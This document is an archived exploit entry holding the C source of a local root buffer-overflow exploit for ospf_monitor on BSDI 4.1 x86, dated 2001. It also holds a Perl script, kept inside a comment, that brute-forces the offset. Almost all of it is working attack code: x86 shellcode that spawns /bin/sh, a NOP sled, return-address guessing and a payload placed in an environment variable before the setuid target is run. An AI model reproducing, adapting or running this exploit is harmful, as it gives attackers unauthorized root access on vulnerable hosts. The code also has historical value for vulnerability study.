Hhp-ospf_smash.c is a local root exploit for ospf_monitor. Tested on BSDI 4.1 x86 default install.
b3df13e1c7b793947794b12771072086104e86b8f0f39f8f17d3b3f017cad2b0
/*********************************************************************
* (ospf_monitor) Local root[uid=0] exploit tested on BSDi 4.1 x86. *
* Author: Cody Tubbs (loophole of hhp). *
* Site: http://www.hhp-programming.net/ *
* Email: pigspigs@yahoo.com *
* Date: 2/23/2001 12:12:32 PST. (NOT CST(TX), :). *
*********************************************************************/
/* ------------- hhp-offset_bruteforce.pl ---------------
#!/usr/bin/perl
#Standard offset/align brute.
if(@ARGV < 3){
print "Usage: $0 <start> <stop> <align>\n";
print "Examp: $0 -10000 0 0\n";
print "Notes: align = 0 through 3\n";
exit(0);
}
($start, $stop, $align) = @ARGV;
for(;$start<=$stop;$start+=4){
system "./x $start $align";
}
**********************************************/
#include <stdio.h>
#define PATH "/usr/contrib/bin/ospf_monitor" // Change path if needed.
#define OFFSET -3600 // Worked, brute ifelse.
#define ALLIGN 2 // Should not be changed.
#define NOP 0x90 // x86.
#define DBUF 998 // 986+4(EBP(hhp!))+4(EIP).
#define HHP 988 // allign+988=(990) (mypad)
#define RET 0x804741c // Unpunch below if wanted.
static char shellcode[] = //BSDi (Replace with setuid(0), etc code).
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh\x69";
long get_sp(void){__asm__("movl %esp,%eax");}
void workit(char *heh){
fprintf(stderr, "(*) (ospf_monitor) Local root exploit.\n");
fprintf(stderr, "(*) Author: Cody Tubbs (loophole of hhp).\n");
fprintf(stderr, "(*) Tested on BSDi 4.1 - x86.\n");
fprintf(stderr, "(*) Usage: %s [offset] [allign(0..3)]\n", heh);
}
main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
int i, offset, allign;
long address;
workit(argv[0]);
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
address = get_sp()-offset;
//address = RET; //Decomment if desired.
if(allign>0){
for(i=0;i<allign;i++){
eipeip[i] = 0x69; //0x69(TM) :D
eipeip[++i] = 0x08; //Delete 0x69(TM) :(
}
}
//for(i=allign;i<HHP;i++){eipeip[i] = 0x08;}//Delete shellcode scrolling.
for(i=allign;i<HHP;i++){ //Print hhp padding before shellcode.
eipeip[i] = 0x68;
eipeip[++i] = 0x68;
eipeip[++i] = 0x70;
eipeip[++i] = 0x20;
}
for(i=allign+HHP;i<DBUF;i+=4){
*(long *)&eipeip[i] = address;
}
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
buffer[i] = NOP;
}
memcpy(buffer+i, shellcode, strlen(shellcode));
memcpy(buffer, "OSPFEX=", 7);
putenv(buffer);
fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
execlp(PATH, "ospf_monitor", eipeip, 0);
}